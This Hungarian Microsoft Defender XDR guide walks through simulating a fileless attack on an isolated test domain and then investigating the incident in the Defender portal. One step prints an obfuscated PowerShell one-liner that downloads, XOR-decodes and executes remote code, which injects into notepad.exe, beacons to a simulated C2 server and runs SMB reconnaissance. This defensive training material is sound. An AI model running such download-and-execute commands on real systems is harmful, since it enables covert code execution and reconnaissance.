Share via

Támadásszimuláció futtatása Microsoft Defender XDR próbakörnyezetben

  • Cikk

Ez a cikk a 2-ből 1. lépés egy incidens vizsgálatának és megoldásának folyamatában Microsoft Defender XDR próbakörnyezet használatával. A folyamatról további információt az áttekintő cikkben talál.

A próbakörnyezet előkészítése után ideje tesztelni Microsoft Defender XDR incidensmegoldási és automatizált vizsgálati és javítási képességeit egy szimulált támadással létrehozott incidens létrehozásával, valamint a Microsoft Defender portál használatával a vizsgálathoz és a reagáláshoz.

A Microsoft Defender XDR incidensei korrelált riasztások és kapcsolódó adatok gyűjteményei, amelyek egy támadás történetét alkotják.

A Microsoft 365 szolgáltatásai és alkalmazásai riasztásokat hoznak létre, ha gyanús vagy rosszindulatú eseményt vagy tevékenységet észlelnek. Az egyes riasztások értékes nyomokat szolgáltatnak egy befejezett vagy folyamatban lévő támadásról. A támadások azonban általában különböző technikákat alkalmaznak különböző típusú entitások, például eszközök, felhasználók és postaládák ellen. Az eredmény több riasztás a bérlő több entitására vonatkozóan.

Megjegyzés:

Ha még csak most ismerkedik a biztonsági elemzéssel és az incidensmegoldással, tekintse meg a Válasz az első incidensre című útmutatót , amely egy tipikus elemzési, szervizelési és incidens utáni áttekintési folyamatot ismerteti.

Támadások szimulálása a Microsoft Defender portállal

A Microsoft Defender portál beépített képességekkel rendelkezik a tesztkörnyezet szimulált támadásainak létrehozásához:

Office 365-höz készült Defender Támadási szimulációs tréning

Office 365-höz készült Defender Microsoft 365 E5 vagy Office 365-höz készült Microsoft Defender 2. csomagja tartalmazza az adathalász támadások támadásszimulációs képzését. Az alapvető lépések a következők:

  1. szimuláció Létrehozás

    Az új szimulációk létrehozásával és elindításával kapcsolatos részletes útmutatásért lásd: Adathalászati támadás szimulálása.

  2. hasznos adat Létrehozás

    A szimuláción belül használható hasznos adatok létrehozásával kapcsolatos részletes útmutatásért lásd: Létrehozás egyéni hasznos adat a támadásszimulációs betanításhoz.

  3. Elemzések készítése

    A jelentéskészítéssel kapcsolatos megállapítások részletes megismeréséhez lásd: Elemzések megszerzése támadásszimulációs betanítással.

További információ: Szimulációk.

A Végponthoz készült Defender támadásokkal kapcsolatos oktatóanyagai & szimulációkhoz

A Végponthoz készült Defender szimulációi a Microsofttól:

  • Dokumentumcsúcsok visszalépése
  • Automatizált vizsgálat (backdoor)

További szimulációk érhetők el külső forrásokból. Emellett oktatóanyagok is rendelkezésre állnak.

Minden szimulációhoz vagy oktatóanyaghoz:

  1. Töltse le és olvassa el a megfelelő útmutató dokumentumot.

  2. Töltse le a szimulációs fájlt. Letöltheti a fájlt vagy a szkriptet a teszteszközre, de ez nem kötelező.

  3. Futtassa a szimulációs fájlt vagy szkriptet a teszteszközön az útmutatóban leírtak szerint.

További információ: Szimulált támadáson keresztüli Végponthoz készült Microsoft Defender.

Támadás szimulálása elkülönített tartományvezérlővel és ügyféleszközzel (nem kötelező)

Ebben az opcionális incidensmegoldási gyakorlatban egy elkülönített Active Directory tartományi szolgáltatások (AD DS) tartományvezérlő és Windows-eszköz elleni támadást szimulál egy PowerShell-szkripttel, majd kivizsgálja, orvosolja és megoldja az incidenst.

Először végpontokat kell hozzáadnia a próbakörnyezethez.

Próbakörnyezeti végpontok hozzáadása

Először fel kell vennie egy elkülönített AD DS-tartományvezérlőt és egy Windows-eszközt a próbakörnyezetbe.

  1. Ellenőrizze, hogy a próbakörnyezet bérlője engedélyezte-e Microsoft Defender XDR.

  2. Ellenőrizze, hogy a tartományvezérlő:

  3. Ellenőrizze, hogy a teszteszköz:

Ha bérlői és eszközcsoportokat használ, hozzon létre egy dedikált eszközcsoportot a teszteszközhöz, és küldje le a legfelső szintre.

Az egyik alternatíva az AD DS-tartományvezérlő üzemeltetésére és az eszköz virtuális gépként való tesztelésére a Microsoft Azure infrastruktúra-szolgáltatásokban. A szimulált vállalati tesztkörnyezet útmutatójának 1. fázisában található utasításokat használhatja, de kihagyhatja az APP1 virtuális gép létrehozását.

Itt látható az eredmény.

A kiértékelési környezet a szimulált vállalati tesztkörnyezet útmutatójának használatával

Kifinomult támadást fog szimulálni, amely fejlett technikákat használ az észlelés elől való elrejtéshez. A támadás számba adja a megnyitott SMB-munkameneteket a tartományvezérlőkön, és lekéri a felhasználók eszközeinek legutóbbi IP-címeit. Ez a támadási kategória általában nem tartalmazza az áldozat eszközére dobott fájlokat, és kizárólag a memóriában fordulnak elő. A meglévő rendszer- és felügyeleti eszközökkel "a földről élnek", és kódjukat a rendszerfolyamatokba injektálva elrejtik a végrehajtásukat. Az ilyen viselkedés lehetővé teszi számukra az észlelés elkerülését és az eszközön való megőrzését.

Ebben a szimulációban a mintaforgatókönyv egy PowerShell-szkripttel kezdődik. A való világban előfordulhat, hogy a felhasználót becsapják egy szkript futtatására, vagy a szkript egy távoli kapcsolatról futhat egy másik számítógéppel egy korábban fertőzött eszközről, ami azt jelzi, hogy a támadó oldalirányú mozgást kísérel meg a hálózaton. A szkriptek észlelése nehéz lehet, mert a rendszergazdák gyakran távolról is futtatnak szkripteket a különböző felügyeleti tevékenységek végrehajtásához.

A fájl nélküli PowerShell-támadás folyamatinjektálással és SMB-felderítési támadással

A szimuláció során a támadás egy látszólag ártatlan folyamatba szúrja be a héjkódot. A forgatókönyv használatához notepad.exe kell használni. Ezt a folyamatot választottuk a szimulációhoz, de a támadók nagyobb valószínűséggel egy hosszú ideig futó rendszerfolyamatot céloznának meg, például svchost.exe. A rendszerhéjkód ezután kapcsolatba lép a támadó parancs- és vezérlési (C2) kiszolgálóval, hogy utasításokat kapjon a folytatáshoz. A szkript felderítési lekérdezéseket kísérel meg végrehajtani a tartományvezérlőn (DC). A felderítés lehetővé teszi, hogy a támadó információkat kapjon a legutóbbi felhasználói bejelentkezési adatokról. Miután a támadók megkapták ezeket az információkat, oldalirányban mozoghatnak a hálózaton, hogy egy adott bizalmas fiókhoz lépjenek

Fontos

Az optimális eredmények érdekében a lehető legszorosabban kövesse a támadásszimulációs utasításokat.

Az izolált AD DS tartományvezérlő támadásszimulációjának futtatása

A támadási forgatókönyv szimulációjának futtatása:

  1. Győződjön meg arról, hogy a próbakörnyezet tartalmazza az elkülönített AD DS-tartományvezérlőt és a Windows-eszközt.

  2. Jelentkezzen be a teszteszközre a tesztfelhasználói fiókkal.

  3. Nyisson meg egy Windows PowerShell ablakot a teszteszközön.

  4. Másolja ki a következő szimulációs szkriptet:

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
$base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
$decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
$i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))

    Megjegyzés:

    Ha webböngészőben nyitja meg ezt a cikket, előfordulhat, hogy problémákba ütközik a teljes szöveg másolása bizonyos karakterek elvesztése vagy további sortörések bevezetése nélkül. Ebben az esetben töltse le ezt a dokumentumot, és nyissa meg az Adobe Readerben.

  5. Illessze be és futtassa a másolt szkriptet a PowerShell-ablakban.

Megjegyzés:

Ha a PowerShellt távoli asztali protokoll (RDP) használatával futtatja, használja a Vágólap szövegének beírása parancsot az RDP-ügyfélben, mert előfordulhat, hogy a CTRL-V gyorsbillentyű vagy a jobb gombbal kattintva beillesztett metódus nem működik. A PowerShell legutóbbi verziói néha nem fogadják el ezt a módszert, előfordulhat, hogy először a jegyzettömbbe kell másolnia a memóriában, majd a virtuális gépre kell másolnia, majd be kell illesztenie a PowerShellbe.

Néhány másodperccel később megnyílik a Jegyzettömb alkalmazás. A rendszer egy szimulált támadási kódot szúr be a Jegyzettömbbe. Tartsa nyitva az automatikusan létrehozott Jegyzettömb-példányt, hogy a teljes forgatókönyvet átélhesse.

A szimulált támadási kód megpróbál kommunikálni egy külső IP-címmel (szimulálva a C2-kiszolgálót), majd megpróbálja felderíteni a tartományvezérlőt az SMB-n keresztül.

A szkript befejeződésekor ez az üzenet jelenik meg a PowerShell-konzolon:

ran NetSessionEnum against [DC Name] with return code result 0

Az Automatikus incidens és reagálás funkció működés közbeni megtekintéséhez hagyja nyitva a notepad.exe folyamatot. Megjelenik az Automatizált incidens és reagálás leállítása a Jegyzettömb folyamatában.

A szimulált támadás incidensének vizsgálata

Megjegyzés:

Mielőtt végigvezetnénk ezen a szimuláción, watch az alábbi videót, amelyből megtudhatja, hogyan segít az incidenskezelés a kapcsolódó riasztások összeállításában a vizsgálati folyamat részeként, hol található meg a portálon, és hogyan segíthet a biztonsági műveletekben:

Az SOC-elemzői nézőpontra váltva megkezdheti a támadás kivizsgálását a Microsoft Defender portálon.

  1. Nyissa meg a Microsoft Defender portált.

  2. A navigációs panelen válassza az Incidensek & riasztási > incidensek lehetőséget.

  3. A szimulált támadás új incidense megjelenik az incidenssorban.

    Példa az Incidensek üzenetsorra

A támadás vizsgálata egyetlen incidensként

Microsoft Defender XDR összekapcsolja az elemzéseket, és összesíti a különböző termékekből származó összes kapcsolódó riasztást és vizsgálatot egy incidensentitásba. Ezzel Microsoft Defender XDR egy szélesebb körű támadási történetet mutat be, amely lehetővé teszi az SOC-elemző számára, hogy megértse és reagáljon az összetett fenyegetésekre.

A szimuláció során létrehozott riasztások ugyanahhoz a fenyegetéshez vannak társítva, ezért a rendszer automatikusan egyetlen incidensként összesíti azokat.

Az incidens megtekintése:

  1. Nyissa meg a Microsoft Defender portált.

  2. A navigációs panelen válassza az Incidensek & riasztási > incidensek lehetőséget.

  3. Válassza ki a legújabb elemet az incidens nevével balra található körre kattintva. Az oldalsó panel további információkat jelenít meg az incidensről, beleértve az összes kapcsolódó riasztást is. Minden incidensnek egyedi neve van, amely a benne foglalt riasztások attribútumai alapján írja le.

    Az irányítópulton megjelenő riasztások a következő szolgáltatási erőforrások alapján szűrhetők: Microsoft Defender for Identity, Microsoft Defender for Cloud Apps, Végponthoz készült Microsoft Defender, Microsoft Defender XDR és Office 365-höz készült Microsoft Defender.

  4. Válassza az Incidensoldal megnyitása lehetőséget az incidenssel kapcsolatos további információkért.

    Az Incidens oldalon megtekintheti az incidenssel kapcsolatos összes riasztást és információt. Az információk közé tartoznak a riasztásban érintett entitások és eszközök, a riasztások észlelési forrása (például Microsoft Defender for Identity vagy Végponthoz készült Microsoft Defender), valamint az összekapcsolásuk oka. Az incidensriasztások listájának áttekintése a támadás előrehaladását mutatja. Ebben a nézetben megtekintheti és megvizsgálhatja az egyes riasztásokat.

    A jobb oldali menü Incidens kezelése elemére kattintva címkézheti meg az incidenst, saját magához rendelheti, és megjegyzéseket adhat hozzá.

A létrehozott riasztások áttekintése

Tekintsünk meg néhány riasztást, amely a szimulált támadás során jön létre.

Megjegyzés:

A szimulált támadás során létrehozott riasztások közül csak néhányat vizsgáljuk meg. A Windows verziójától és a teszteszközön futó Microsoft Defender XDR termékektől függően előfordulhat, hogy további riasztások jelennek meg, amelyek kissé eltérő sorrendben jelennek meg.

Példa a létrehozott riasztásra

Riasztás: Gyanús folyamatinjektálás figyelhető meg (forrás: Végponthoz készült Microsoft Defender)

A fejlett támadók kifinomult és rejtett módszereket használnak a memóriában való megőrzéshez és az észlelési eszközök elől való elrejtéshez. Az egyik gyakori módszer a megbízható rendszerfolyamatból való működés, nem pedig egy rosszindulatú végrehajtható fájl, ami megnehezíti az észlelési eszközök és a biztonsági műveletek számára a rosszindulatú kód észlelését.

Annak érdekében, hogy az SOC-elemzők elkaphassák ezeket a fejlett támadásokat, a mélymemória-érzékelők Végponthoz készült Microsoft Defender példátlan betekintést nyújtanak a felhőszolgáltatásunkba számos folyamatközi kódinjektálási technikába. Az alábbi ábra bemutatja, hogyan észlelte és figyelmeztette a Végponthoz készült Defendert, amikor kódot próbált beszúrni notepad.exe.

Példa egy potenciálisan rosszindulatú kód beszúrására vonatkozó riasztásra

Riasztás: Parancssori argumentumok nélküli folyamatfuttatás által megfigyelt váratlan viselkedés (forrás: Végponthoz készült Microsoft Defender)

Végponthoz készült Microsoft Defender észlelések gyakran a támadási technika leggyakoribb attribútumát célzják. Ez a módszer biztosítja a tartósságot, és megnöveli a lécet a támadók számára, hogy újabb taktikákra váltson.

Nagy léptékű tanulási algoritmusokat alkalmazunk a szervezeten belüli és globális gyakori folyamatok normál viselkedésének meghatározására, és watch, amikor ezek a folyamatok rendellenes viselkedést mutatnak. Ezek a rendellenes viselkedések gyakran azt jelzik, hogy idegen kód lett bevezetve, és egy egyébként megbízható folyamatban fut.

Ebben a forgatókönyvben a folyamatnotepad.exe rendellenes viselkedést mutat, beleértve a külső helyekkel való kommunikációt is. Ez az eredmény független a rosszindulatú kód bevezetéséhez és végrehajtásához használt konkrét módszerétől.

Megjegyzés:

Mivel ez a riasztás olyan gépi tanulási modelleken alapul, amelyek további háttérfeldolgozást igényelnek, eltarthat egy ideig, amíg megjelenik ez a riasztás a portálon.

Figyelje meg, hogy a riasztás részletei tartalmazzák a külső IP-címet – ez egy olyan mutató, amelyet kimutatásként használhat a vizsgálat kibontásához.

Válassza ki az IP-címet a riasztási folyamat fájában az IP-cím részleteinek megtekintéséhez.

Példa egy parancssori argumentumok nélküli folyamatfuttatás váratlan viselkedésére

Az alábbi ábrán a kiválasztott IP-cím részletei lap látható (a Riasztási folyamat fájában kattintson az IP-címre).

Példa az IP-cím részleteit tartalmazó lapra

Riasztás: Felhasználó és IP-cím felderítése (SMB) (Forrás: Microsoft Defender for Identity)

A Server Message Block (SMB) protokollt használó enumerálás lehetővé teszi a támadók számára a legutóbbi felhasználói bejelentkezési adatok lekérését, amelyek segítségével oldalirányban mozognak a hálózaton egy adott bizalmas fiók elérése érdekében.

Ebben az észlelésben riasztás aktiválódik, ha az SMB-munkamenet számbavétele egy tartományvezérlőn fut.

Példa Microsoft Defender for Identity felhasználó- és IP-címfelderítésre vonatkozó riasztásra

Az eszköz idővonalának áttekintése Végponthoz készült Microsoft Defender

Az incidens különböző riasztásainak felfedezése után lépjen vissza a korábban megvizsgált incidensoldalra. Az incidens oldalán az Eszközök fülre kattintva áttekintheti az incidensben érintett eszközöket az Végponthoz készült Microsoft Defender és Microsoft Defender for Identity által jelentett módon.

Válassza ki annak az eszköznek a nevét, amelyen a támadás történt, és nyissa meg az adott eszköz entitáslapját. Ezen az oldalon megtekintheti az aktivált riasztásokat és a kapcsolódó eseményeket.

Az Idősor fülre kattintva nyissa meg az eszköz ütemtervét, és tekintse meg az eszközön megfigyelt összes eseményt és viselkedést időrendi sorrendben, a riasztásokkal együtt.

Példa az eszköz idővonalára viselkedésekkel

Az érdekesebb viselkedések kibontása hasznos részleteket tartalmaz, például folyamatfákat.

Görgessen le például, amíg meg nem találja a megfigyelt Gyanús folyamatinjektálás riasztási eseményt. Válassza ki az alatta lévő notepad.exe folyamateseménybe injektáltpowershell.exe a viselkedés teljes folyamatfáját az oldalpanel Eseményentitások grafikonján. Szükség esetén használja a keresősávot a szűréshez.

Példa a kiválasztott PowerShell-fájllétrehozás folyamatfára

A felhasználói adatok áttekintése a Microsoft Defender for Cloud Apps

Az incidens oldalán válassza a Felhasználók lapot a támadásban érintett felhasználók listájának megjelenítéséhez. A táblázat további információkat tartalmaz az egyes felhasználókról, beleértve az egyes felhasználók vizsgálati prioritási pontszámát is.

Válassza ki a felhasználónevet a felhasználó profillapjának megnyitásához, ahol további vizsgálat végezhető. További információ a kockázatos felhasználók vizsgálatáról.

A Defender for Cloud Apps felhasználói oldala

Automatizált vizsgálat és szervizelés

Megjegyzés:

Mielőtt végigvezetnénk ezen a szimuláción, watch az alábbi videót, amelyből megismerheti, hogy mi az automatikus önjavítás, hol található meg a portálon, és hogyan segíthet a biztonsági műveletekben:

Lépjen vissza az incidenshez a Microsoft Defender portálon. Az Incidens lap Vizsgálat lapja a Microsoft Defender for Identity és Végponthoz készült Microsoft Defender által aktivált automatizált vizsgálatokat mutatja. Az alábbi képernyőképen csak a Végponthoz készült Defender által aktivált automatizált vizsgálat látható. Alapértelmezés szerint a Végponthoz készült Defender automatikusan szervizeli az üzenetsorban található összetevőket, ami szervizelést igényel.

Példa az incidenssel kapcsolatos automatizált vizsgálatokra

Válassza ki a vizsgálatot kiváltó riasztást a Vizsgálat részletei lap megnyitásához. A következő részletek láthatók:

  • Az automatizált vizsgálatot kiváltó riasztás(ok).
  • Érintett felhasználók és eszközök. Ha további eszközökön is találhatók jelzők, ezek a további eszközök is fel lesznek sorolva.
  • Bizonyítéklista. A talált és elemzett entitások, például fájlok, folyamatok, szolgáltatások, illesztőprogramok és hálózati címek. Ezeket az entitásokat a rendszer elemzi a riasztással való lehetséges kapcsolatok alapján, és jóindulatúnak vagy rosszindulatúnak minősíti őket.
  • Fenyegetések találhatók. A vizsgálat során észlelt ismert fenyegetések.

Megjegyzés:

Az időzítéstől függően előfordulhat, hogy az automatizált vizsgálat továbbra is fut. Várjon néhány percet, amíg a folyamat befejeződik, mielőtt összegyűjti és elemzi a bizonyítékokat, és áttekinti az eredményeket. Frissítse a Vizsgálat részletei oldalt a legújabb eredmények lekéréséhez.

Példa a Vizsgálat részletei lapra

Az automatizált vizsgálat során Végponthoz készült Microsoft Defender azonosította a notepad.exe folyamatot, amelyet a szervizelést igénylő összetevők egyikeként szúrtak be. A Végponthoz készült Defender automatikusan leállítja a gyanús folyamatinjektálást az automatikus szervizelés részeként.

Láthatja ,notepad.exe eltűnik a teszteszközön futó folyamatok listájából.

Az incidens megoldása

Miután a vizsgálat befejeződött, és meggyőződött a javításról, meg kell oldania az incidenst.

Az Incidens lapon válassza az Incidens kezelése lehetőséget. Állítsa az állapotot Incidens feloldása értékre, majd válassza az Igaz riasztás lehetőséget a besoroláshoz és a biztonsági teszteléshez a meghatározáshoz.

Példa az incidensek lapra a megnyitott Incidens kezelése panellel, ahol a kapcsolóra kattintva megoldhatja az incidenst

Az incidens megoldásakor az összes kapcsolódó riasztást feloldja a Microsoft Defender portálon és a kapcsolódó portálokon.

Ez becsomagolja a támadásszimulációkat az incidenselemzéshez, az automatizált vizsgálathoz és az incidensmegoldáshoz.

További lépés

Az Microsoft Defender XDR incidensmegoldási képességek

2/2. lépés: Az incidensmegoldási képességek kipróbálása Microsoft Defender XDR

Microsoft Defender XDR kiértékelési környezet Létrehozás

Tipp

Szeretne többet megtudni? Lépjen kapcsolatba a Microsoft biztonsági közösségével a technikai közösségünkben: Microsoft Defender XDR Tech Community.